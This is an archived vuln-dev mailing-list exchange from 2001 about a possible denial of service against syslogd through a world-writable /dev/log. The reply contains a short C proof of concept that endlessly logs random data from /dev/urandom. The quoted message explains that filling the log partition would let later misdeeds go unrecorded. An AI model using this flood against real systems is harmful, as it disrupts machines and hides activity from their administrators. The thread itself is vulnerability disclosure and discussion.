well that wouldnt work to well as syslog likes to do "message repeating X number of times" , so trying to fill it up would prove boring and pointless. but yea u could do it simple like this #include <stdio.h> #include <syslog.h> main() { FILE *fp; char buffer[1024]; printf("Starting Dos..\n"); if((fp=fopen("/dev/urandom","r"))==NULL) { printf("Error Opening /dev/urandom\n"); exit(0); } for(;;) { fgets(buffer,sizeof(buffer),fp); buffer[strlen(buffer)-1]='\0'; syslog(0,buffer,strlen(buffer)); } } something as simple as that works, but for some reason when i run it on my box it seems to exit after awhile even tho i capture all signal's maybe syslog() has a exit() in the function , i cant be bothered looking into it, i did this code on the fly for proof of concept ----- Original Message ----- From: Petr Baudis <paskyat_private> To: <vuln-devat_private> Sent: Thursday, October 04, 2001 6:09 AM Subject: Possible syslogd DoS ? > Hello, > I just recently came on a thought (thanks to Marek Jaros) of possible > DoS of syslogd. It uses /dev/log for receiving log messages, which has > mode 0666 on most linuxes. It should be ok, as many non-root applications > should be allowed to log things etc. > But imagine that you will send a lot of very long messages there, different > everytime in order not to get stripped into kinda 'message repeated x times'. > In this way, you can imho flood syslogd successfully, possibly filling whole > partition where /var/log resides, regardless to your quota settings on > the machine! > Then, if /var/log is not on separate partition, the whole system can get > into serious problems, and especially, further events won't be obviously > logged, so you can do evil things there happily and nobody will know about it. > Discussion? Something i didn't take into account? Possible solutions? > > -- > > Petr "Pasky" Baudis > . > n = ((n >> 1) & 0x55555555) | ((n << 1) & 0xaaaaaaaa); > n = ((n >> 2) & 0x33333333) | ((n << 2) & 0xcccccccc); > n = ((n >> 4) & 0x0f0f0f0f) | ((n << 4) & 0xf0f0f0f0); > n = ((n >> 8) & 0x00ff00ff) | ((n << 8) & 0xff00ff00); > n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000); > -- C code which reverses the bits in a word. > . > My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M- > !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y? > ------END GEEK CODE BLOCK------
This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 08:29:06 PDT